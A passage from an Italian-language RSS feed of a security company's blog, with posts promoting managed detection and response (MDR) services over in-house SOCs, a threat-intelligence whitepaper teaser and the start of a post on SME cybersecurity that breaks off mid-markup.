&lt;li&gt;&lt;strong&gt;Customer Service Specialist&lt;/strong&gt;, che rappresentano il punto di contatto continuo con il cliente, facilitando la comunicazione, coordinando le attività operative e assicurando che le esigenze specifiche siano comprese e trasformate in azioni concrete per migliorare la postura di sicurezza.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Un team eterogeneo è un team capace di &lt;strong&gt;osservare la minaccia da più prospettive&lt;/strong&gt; — tecnica, strategica, investigativa — e di rispondere con rapidità, precisione e visione proattiva, fornendo indicazioni preziose per rafforzare costantemente le difese aziendali.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Conclusione&lt;/h2&gt;
&lt;p&gt;La forza di un servizio MDR risiede nell’equilibrio tra tecnologia all’avanguardia e competenze umane di alto livello.
Un provider che investe nelle persone, nella formazione continua e in processi di detection ingegnerizzati secondo standard internazionali non offre solo reattività, ma resilienza.
Perché, alla fine, anche nell’era dell’automazione, &lt;strong&gt;la differenza la fanno ancora le persone&lt;/strong&gt; — quelle che sanno leggere un log come un indizio, e un allarme come un’opportunità per migliorare la difesa.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/mdr-come-partner-di-crescita/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAKABQDASIAAhEBAxEB/8QAGAAAAgMAAAAAAAAAAAAAAAAAAAQCAwX/xAAVAQEBAAAAAAAAAAAAAAAAAAABAv/aAAwDAQACEAMQAAAB1U2ZIsVkn//EABoQAAMAAwEAAAAAAAAAAAAAAAECAwAEETL/2gAIAQEAAQUCzZo8zPYDqvpx1JqOf//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8BP//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8BP//EABkQAQACAwAAAAAAAAAAAAAAAAABEQISMf/aAAgBAQAGPwJjqukptyH/xAAbEAEBAAIDAQAAAAAAAAAAAAABEQAhEEFRkf/aAAgBAQABPyGIsxBWm/cqDGzXBIYEneBcLfmf/9oADAMBAAIAAwAAABAj3//EABURAQEAAAAAAAAAAAAAAAAAAAAR/9oACAEDAQE/EIr/xAAWEQEBAQAAAAAAAAAAAAAAAAAAEQH/2gAIAQIBAT8Qq6//xAAcEAEBAAICAwAAAAAAAAAAAAABEQAhQVExYfD/2gAIAQEAAT8QHRCvmYjjSsJE0nUuTqSRsPsxv33mzmkFMDAOADgz/9k=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;MDR partner crescita2&quot; title=&quot;&quot; src=&quot;/website/static/e975710c0b894a873983e76e3fd6fdfe/ac99c/MDR%20partner%20crescita2.jpg&quot; srcset=&quot;/website/static/e975710c0b894a873983e76e3fd6fdfe/4ecad/MDR%20partner%20crescita2.jpg 384w,
/website/static/e975710c0b894a873983e76e3fd6fdfe/212bf/MDR%20partner%20crescita2.jpg 768w,
/website/static/e975710c0b894a873983e76e3fd6fdfe/ac99c/MDR%20partner%20crescita2.jpg 1536w,
/website/static/e975710c0b894a873983e76e3fd6fdfe/e1596/MDR%20partner%20crescita2.jpg 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Oltre il rilevamento e la risposta]]></title><description><![CDATA[L’MDR come partner di crescita]]></description><link>https://www.certego.net/blog/mdr-come-partner-di-crescita/</link><guid isPermaLink="false">mdr-come-partner-di-crescita</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Mon, 20 Oct 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Per molte aziende, la domanda non è più se investire in sicurezza, ma come farlo in modo sostenibile. &lt;strong&gt;Costruire un SOC interno o affidarsi a un servizio MDR non è solo una scelta tecnologica&lt;/strong&gt;: è una decisione strategica che influenza la capacità dell’organizzazione di maturare nel tempo.&lt;/p&gt;
&lt;p&gt;Secondo il 2024 Designing and Building Modern Security Operations Survey di Gartner, il 92% dei leader di sicurezza dichiara di conoscere e comprendere la funzione SecOps della propria organizzazione. Tuttavia, la consapevolezza non basta: tra conoscenza e reale maturità operativa c’è ancora un divario significativo.
Molte realtà faticano a sviluppare un SOC realmente efficace a causa di vincoli di risorse, entropia decisionale e sovraccarico operativo. In altre parole, team sovraccarichi di lavoro ma con risultati inferiori alle aspettative. È un limite strutturale che rende difficile mantenere nel tempo capacità di monitoraggio 24/7, risorse L1-L3 dedicate e processi di incident response sempre aggiornati.&lt;/p&gt;
&lt;p&gt;Un SOC interno può trasmettere la sensazione di un controllo più diretto e di una maggiore autonomia, ma richiede una struttura complessa: analisti operativi 24/7, piattaforme tecnologiche e processi di risposta e aggiornamento continuo. È un modello che funziona bene solo quando c’è massa critica e disponibilità costante di competenze, risorse e tempo.
E proprio qui si manifesta la sfida più grande: mentre le organizzazioni puntano a far evolvere la propria funzione SecOps, spesso si trovano intrappolate in un sistema che consuma più energia di quanta ne restituisca in valore.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;L’MDR come leva di maturazione&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Un servizio MDR evoluto&lt;/strong&gt; non si limita a rilevare e rispondere agli incidenti: &lt;strong&gt;accelera la crescita della postura di sicurezza aziendale&lt;/strong&gt;. Ogni alert gestito, ogni indagine condotta, ogni raccomandazione condivisa diventa un’occasione di apprendimento.&lt;/p&gt;
&lt;p&gt;Grazie alla &lt;strong&gt;visione trasversale maturata su centinaia di ambienti diversi&lt;/strong&gt;, gli analisti MDR portano prospettive e best practice che un SOC interno, isolato nella propria esperienza, faticherebbe a sviluppare. Questo significa trasformare gli eventi di sicurezza in momenti di consapevolezza, capaci di migliorare configurazioni, processi e comportamenti. Nel tempo, il rapporto con la sicurezza cambia natura: da “servizio gestito” a partnership strategica che evolve insieme all’azienda.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 34.895833333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAHABQDASIAAhEBAxEB/8QAFgABAQEAAAAAAAAAAAAAAAAAAAIF/8QAFQEBAQAAAAAAAAAAAAAAAAAAAAH/2gAMAwEAAhADEAAAAdwJQP/EABgQAAIDAAAAAAAAAAAAAAAAAAABEBEh/9oACAEBAAEFAqZsf//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8BP//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8BP//EABYQAQEBAAAAAAAAAAAAAAAAADEAEP/aAAgBAQAGPwJnP//EABkQAAIDAQAAAAAAAAAAAAAAAAABEUFRof/aAAgBAQABPyHAJX4FJ//aAAwDAQACAAMAAAAQDB//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAEDAQE/ED//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAECAQE/ED//xAAbEAEAAgMBAQAAAAAAAAAAAAABABEhMVGBof/aAAgBAQABPxBHUHEv7MujyADLb3U//9k=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/38ce67e4b10b11849e6b7c2bb3aa0901/ac99c/MDR-partner-crescita-FRASE.jpg&quot; srcset=&quot;/website/static/38ce67e4b10b11849e6b7c2bb3aa0901/4ecad/MDR-partner-crescita-FRASE.jpg 384w,
/website/static/38ce67e4b10b11849e6b7c2bb3aa0901/212bf/MDR-partner-crescita-FRASE.jpg 768w,
/website/static/38ce67e4b10b11849e6b7c2bb3aa0901/ac99c/MDR-partner-crescita-FRASE.jpg 1536w,
/website/static/38ce67e4b10b11849e6b7c2bb3aa0901/294ea/MDR-partner-crescita-FRASE.jpg 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;Come osserva Gartner, sempre nella Designing and Building Modern Security Operations Survey, integrare threat hunting, operational threat intelligence e digital forensics rappresenta una delle cinque iniziative con il miglior ROI per i prossimi due-tre anni: attività fondamentali per reagire più velocemente alle minacce e rendere la difesa più proattiva. Un MDR maturo incorpora già questi elementi, aiutando le organizzazioni a colmare il gap di maturità senza sovraccaricare i team interni.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;La forza dello stack tecnologico&lt;/h2&gt;
&lt;p&gt;Un altro elemento chiave che distingue un MDR maturo è la tecnologia su cui si basa. Quando il provider sviluppa e integra un proprio stack tecnologico, ottimizzato per la detection, la correlazione, l’applicazione di dati di threat intelligence e la risposta, l’azienda cliente beneficia non solo di un servizio, ma di un ecosistema e di una architettura tecnologica in continua evoluzione.
Questo porta vantaggi concreti:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Accesso a soluzioni avanzate&lt;/strong&gt; che un singolo SOC interno difficilmente potrebbe implementare o mantenere autonomamente.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Aggiornamenti e miglioramenti continui&lt;/strong&gt;, frutto dell’esperienza cumulata su più ambienti e dell’analisi di minacce reali.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integrazione fluida con i sistemi esistenti&lt;/strong&gt;, grazie a un approccio progettato per adattarsi a realtà eterogenee, on-premise o cloud.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Metriche e visibilità centralizzata&lt;/strong&gt;, che permettono di misurare nel tempo la maturità della postura di sicurezza.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In questo modo, lo stack tecnologico dell’MDR diventa una &lt;strong&gt;leva di crescita condivisa&lt;/strong&gt;: ciò che viene appreso in un ambiente viene trasferito e tradotto in miglioramenti per tutti i clienti. L’azienda non compra una “soluzione statica”, ma entra in un ecosistema che evolve insieme alle minacce — e quindi anche insieme al proprio livello di maturità.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;La forza dell’esperienza condivisa&lt;/h2&gt;
&lt;p&gt;Dietro un servizio MDR ci sono analisti ed esperti di cybersecurity certificati che vivono ogni giorno la realtà del contrasto agli attacchi: GCIA, GCIH, OSCP, CISSP — non solo titoli, ma esperienza concreta accumulata su centinaia di incidenti, investigazioni forensi e attività di threat hunting.
Lavorando in team multidisciplinari, questi professionisti mettono a fattore comune ciò che apprendono da ogni caso. Il risultato? Il cliente non riceve solo una risposta tecnica, ma un trasferimento continuo di conoscenza che si traduce in processi più solidi, policy più efficaci e decisioni più informate.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/troppi-allarmi-ridurre-alert-fatigue-senza-perdere-sicurezza/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsTAAALEwEAmpwYAAACRklEQVR42j2RXUhTYRjHX7MiIfCipEFEXaxAKIKILjKiBKGiRksibyxvKiKCyAu7EPvEIYaa0jQGEikMWhdmxlwym3NH177P2Zfz7Jz3vB9nZ2ebaxLd9x6N4M/DAy/P8/6e/x+IMnLNLy76udk5dyTGk4IOsaqQAhNrUEEX+HQsJtByTSEaxHT7aVsgD7HPH0ims98XvMlURtV0SguEFjCrhJYq1YDHM9xp5VzTkkJxqco2/t8O8rgQkPUMLkpahVc0QabL6zQmqSmohkSyJOkoHiiOdlVG7xSn+gSvp1iplas1GRkIIIdUp4DfhtFzDg6G8KcUtf3EwxEyHkFDQehKa7IQ5R3PfEM9fdcvNDeaLFdvLi5xm7//UE0HjEEUZVFShJwcTWaTmRyfzCZSWQVThFW9XFnw+s+0Wg83n9vZcKiu4SAADfW793c97OEzImAAwUgiGI6HovEffm41FPUtr7g93kwuj6lGtFIilhjp7v7Y+3TyyaMHlvbLZ9s6rR2nj578YHcAhp7Lw3VJYVWEiPknQsIikBRiGE40Smj/jfaJtovCvY7hU8cft5yfunt75Mol3jltDOuVamnjF7OBdYgwqzUmtCWIaLG6OTlmPwF23D92YM1q6jWbzXv2WppMc/ZxA3vW7XXNuJ2fv/pXwizYJFQziso+N3AkRVaIvlF7+cp2ZF/TtcZdrXXgVn19JwATr/v/Dc98W3B9mV/iQkg1htNQzW0dspaHRipYLW3UwuHY2DvH+4FB7s2AYHux6vX9Bc0vsJ4NB+LCAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Alert Fatigue Certego&quot; title=&quot;&quot; src=&quot;/website/static/eaddc5f264f75a0f3c90b47750acaf99/71c1d/Alert-Fatigue-Certego.png&quot; srcset=&quot;/website/static/eaddc5f264f75a0f3c90b47750acaf99/804b2/Alert-Fatigue-Certego.png 384w,
/website/static/eaddc5f264f75a0f3c90b47750acaf99/e5715/Alert-Fatigue-Certego.png 768w,
/website/static/eaddc5f264f75a0f3c90b47750acaf99/71c1d/Alert-Fatigue-Certego.png 1536w,
/website/static/eaddc5f264f75a0f3c90b47750acaf99/01294/Alert-Fatigue-Certego.png 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Il vantaggio che resta nel tempo&lt;/h2&gt;
&lt;p&gt;Mentre un SOC interno deve continuamente dimostrare di poter mantenere il ritmo di evoluzione delle minacce, un MDR cresce costantemente insieme al proprio ecosistema di intelligence, strumenti e competenze.
Per l’azienda, questo significa maturare senza rallentare:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Visibilità e risposta sempre aggiornate alle nuove minacce&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Raccomandazioni concrete per migliorare la postura di sicurezza&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Un ciclo virtuoso di &lt;strong&gt;apprendimento continuo che consolida la resilienza organizzativa&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;La sicurezza non rappresenta un centro di costo, ma un fattore di crescita che aumenta la fiducia, la prontezza e la capacità decisionale del business.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affidarsi a un MDR con esperti di cybersecurity eterogenei e certificati e una architettura tecnologica proprietaria: significa abbracciare un modello di sicurezza che evolve con l’azienda: proattivo, condiviso e capace di trasformare ogni possibile minaccia in un passo avanti verso la maturità&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;/website/13eef96f25fe5b977ed7c9d67a2628a3/Ecosistema applicativo Certego.pdf&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACrklEQVR42jWSW0tUURiG5wcEQaFRqZ0sM63IrMjKhCAPF12Jd0J0UwR1U1ddlJ2gME9EQUVloJKjZVl4LC2dnJPjjHPSGWfvmXHv2eNkakQQzcV+WjPSxcP7rg/WWt/7rWXwSir97ig+WcEdUnAEFSyBeayClHeFVuszskp0PkZEEIsniCoaSmwBVUuka5oWT2nSkNrY8DXES4tMy5iU9imahb83OkfTWIjHJok2WxhFiSFHY4yOmwlJEWwOJxPWSaSoyrhXIhCKJA1+cfOAV6HXKfPaLvPcLNHnCvNR0Dkp0z0V5oMrijWoEo9pSNoS15qfMTYywpsJNw1PW/F4fDw09uFweZOGaRGn6bOPRzaNRlOETqdKr2+BDmeMLpdKu03miSlIvyOAFJLxByTRlQP/bJCZsIrbHyAsOvQEI0JFZIvVTkNjC3fvP+DJs+fcuXWb+voG6upuMjQ4zEJikXMXr1BUWk7xyXIOlp7m0MkKsa5gcMTE799/0BYWWVr+ybyiJQ2+mSA973ppa+tgaPgzxu631D9o5PqNm4x/MxNR4pSUV7Mu9zBHS09RWHKKrMITZG7fy5maWi5cvsrZ85c4f/nKauR5Nc73HyssrfwisbicVi3xg7ggVQ+K4ZdW1ZCzr4y8w6fZe6ySvCNVZGzbRcaWXNZk5rBmQzZrN21l4NOXpCEwJ2O1T6VxON1MuTxp7A4XHt8MUkShsrqWrPxidhYdJ7/4BLniwMwdBWwvOEBO/n427ywke/c+hkfHk4bZoMS3CSsTFhsWm0OoHZvdma6ZxXwnp6aZ9vhFHA/TXj9fTFZy9peJjraxcUc+GVvzWJ+dK/ye1QPFC+lyRNH/63+fQgorekiO6mLYuvjAekwQVeK68f2g/qLttf6qoytNa7tRbzf2MDsn//0HNFlcJ1R2JgoAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Ecosistema Applicativo Certego&quot; title=&quot;&quot; src=&quot;/website/static/b036ec71a29d08690e4e86f3a043f86e/71c1d/Ecosistema%20Applicativo%20Certego.png&quot; srcset=&quot;/website/static/b036ec71a29d08690e4e86f3a043f86e/804b2/Ecosistema%20Applicativo%20Certego.png 384w,
/website/static/b036ec71a29d08690e4e86f3a043f86e/e5715/Ecosistema%20Applicativo%20Certego.png 768w,
/website/static/b036ec71a29d08690e4e86f3a043f86e/71c1d/Ecosistema%20Applicativo%20Certego.png 1536w,
/website/static/b036ec71a29d08690e4e86f3a043f86e/a878e/Ecosistema%20Applicativo%20Certego.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Ottobre 2025]]></description><link>https://www.certego.net/blog/whitepaper-ottobre-2025-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-ottobre-2025-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Thu, 02 Oct 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di ottobre 2025, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Cybersecurity nelle PMI]]></title><description><![CDATA[Una priorità da non rimandare]]></description><link>https://www.certego.net/blog/cybersecurity-nelle-pmi/</link><guid isPermaLink="false">cybersecurity-nelle-pmi</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Wed, 01 Oct 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Sommario&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;#1&quot;&gt;Cybersecurity nelle PMI: lo scenario - A cura di Certego&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#perche&quot;&gt;Perché investire conviene&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#difesa&quot;&gt;Dalla difesa passiva alla risposta proattiva&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2&quot;&gt;Cybersicurezza nelle PMI italiane: consapevolezza, criticità e strumenti per affrontare le nuove sfide digitali - Intervista con Francesco Napoli, Vice Presidente nazionale di CONFAPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3&quot;&gt;Cybersicurezza e infrastrutture: strategie, sfide e buone pratiche nel settore dei cantieri stradali - Intervista con l’Avv. Icilio Polidoro, referente Affari Legali di Divisione Cantieri Stradali S.p.A&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;&lt;a id=&quot;1&quot;&gt;&lt;/a&gt; 1. Cybersecurity nelle PMI: lo scenario - A cura di Certego&lt;/h2&gt;
&lt;p&gt;Negli ultimi anni il panorama digitale delle PMI italiane si è trasformato in profondità: la crescente adozione di tecnologie, l’uso massiccio di dispositivi connessi (endpoint, IoT, accessi da remoto) e l’integrazione sempre più stretta con filiere e partner hanno ampliato in modo significativo la superficie d’attacco. In questo contesto, la cybersecurity non è più un’opzione, ma una necessità strategica: la digitalizzazione accelerata — spinta dalla modernizzazione dei processi produttivi e dall’apertura a mercati globali — ha reso le PMI un bersaglio privilegiato per attacchi informatici sofisticati, capaci di compromettere continuità operativa, reputazione e competitività.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/blog/whitepaper-state-of-cybersecurity-gennaio-giugno-2025/&quot;&gt;Il nostro report semestrale “State of Cybersecurity 2025”, realizzato da Certego in collaborazione con AUSED&lt;/a&gt;, evidenzia come le PMI siano ormai uno dei bersagli privilegiati del cybercrime: nei primi sei mesi dell 2025 si registrano 2.314 attacchi, con un incremento del 10%. In altre parole, un attacco informatico su tre in Italia colpisce una piccola o media impresa. Un dato che conferma come la minaccia non interessi più soltanto le grandi realtà, ma si stia estendendo in modo crescente al cuore del tessuto produttivo italiano.&lt;/p&gt;
&lt;h3&gt;&lt;a id=&quot;perche&quot;&gt;&lt;/a&gt; Perché investire conviene&lt;/h3&gt;
&lt;p&gt;Alcune PMI tendono ancora a considerare la cybersecurity come un costo anziché come un investimento strategico. Si tratta di un errore di prospettiva che può rivelarsi rischioso: un attacco ransomware o una violazione di dati non produce soltanto danni economici immediati, ma può compromettere la continuità operativa, la reputazione e la fiducia del mercato.
Il vero costo, quindi, non è quello legato all’adozione di soluzioni di protezione, ma quello derivante dal non essere adeguatamente protetti.&lt;/p&gt;
&lt;h3&gt;&lt;a id=&quot;difesa&quot;&gt;&lt;/a&gt; Dalla difesa passiva alla risposta proattiva&lt;/h3&gt;
&lt;p&gt;In questo scenario, le difese tradizionali non bastano più. Firewall, antivirus e backup sono necessari, ma insufficienti a fronte di minacce sempre più evolute e persistenti. Ciò che serve oggi alle PMI è un approccio proattivo e strutturato, basato su:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Monitoraggio continuo 24/7&lt;/strong&gt;, per rilevare tempestivamente anomalie e attività sospette;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Detection &amp;#x26; Response gestita (MDR)&lt;/strong&gt;, che unisce tecnologie avanzate di rilevamento e il lavoro di team di analisti specializzati;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Formazione del personale&lt;/strong&gt;, perché le persone sono la prima linea di difesa;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Adozione di best practice di compliance (GDPR, NIS2)&lt;/strong&gt; come parte integrante della strategia aziendale.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Solo così le PMI possono trasformare la cybersecurity da mero adempimento a vantaggio competitivo.&lt;/p&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;h2&gt;&lt;a id=&quot;2&quot;&gt;&lt;/a&gt; 2. Cybersicurezza nelle PMI italiane: consapevolezza, criticità e strumenti per affrontare le nuove sfide digitali - Intervista con Francesco Napoli, Vice Presidente nazionale di CONFAPI&lt;/h2&gt;
&lt;div align=&quot;left&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/25d295298e5f18c8515358915131513f/01294/Napoli.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsTAAALEwEAmpwYAAACN0lEQVR42l2SzUsUYRzH597/0qmLl8CDh6iIQio0il42SIQMFQ8Gi6ghKMGCle4h3YxUfFnX1n3T3dVth81153V3dmZ2nnl55pnnmRldKwiiY2OeCr78+F4+X77w+1KaAdcyhb0DOpFMHbGCTXzDxiYi57Idl9fMOoCBsRD5TxQw7f2DsizJxXxBajRd18cOdrFLcABjTLw027wy+YYWZeweB7n/wLpNvuh+UsY54O+quKigvIJSTVRQEID42PWygnpzam4hU/pUqHjuMbAcAzrnKRSAZJ6BQyVjjoGjtDlRsQIzXoFTh3BdtOsW4aRWbGU9Es8+j65sJbO/vn87Of1x2j51iE8FATkRbDJaXtBygrYrgn3J3GTUONPakRCjY2RadLHYMzN3PxILjc3wmW0unQhHP3KqQQUdOE5gGbZaZZgaW/srnuWABjxMbLct8Sw9O/Z5NnxtaKTj7qPeUP+LkdELnbfGF1cpEzp1SREasthQWLEpSuoRV1d1y8auaSHn52+ZP4w+7c68GpieDlOXum4Mhq8PvKQudk6+X6ZMmwi6LehIMJwa9A80XAYkrzoVDbUQERSrp6f/9bOHw733uq4+GIxEjSOa8F87Hg9MrKXPaq8m92IbqfnlRLpUlW2vYTqShYMLkCcr4Hb3k1DfVPedvsuh4ZG3S+mlBS+3yC9Hggefwcl0fju1u5nIlOgqcX2IsO0E8yDQxoj43km7xist3SrXlXfrOx9WNrJb8XIuxQr1P/Q6xxvfjvvIAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/25d295298e5f18c8515358915131513f/71c1d/Napoli.png&quot; srcset=&quot;/website/static/25d295298e5f18c8515358915131513f/804b2/Napoli.png 384w,
/website/static/25d295298e5f18c8515358915131513f/e5715/Napoli.png 768w,
/website/static/25d295298e5f18c8515358915131513f/71c1d/Napoli.png 1536w,
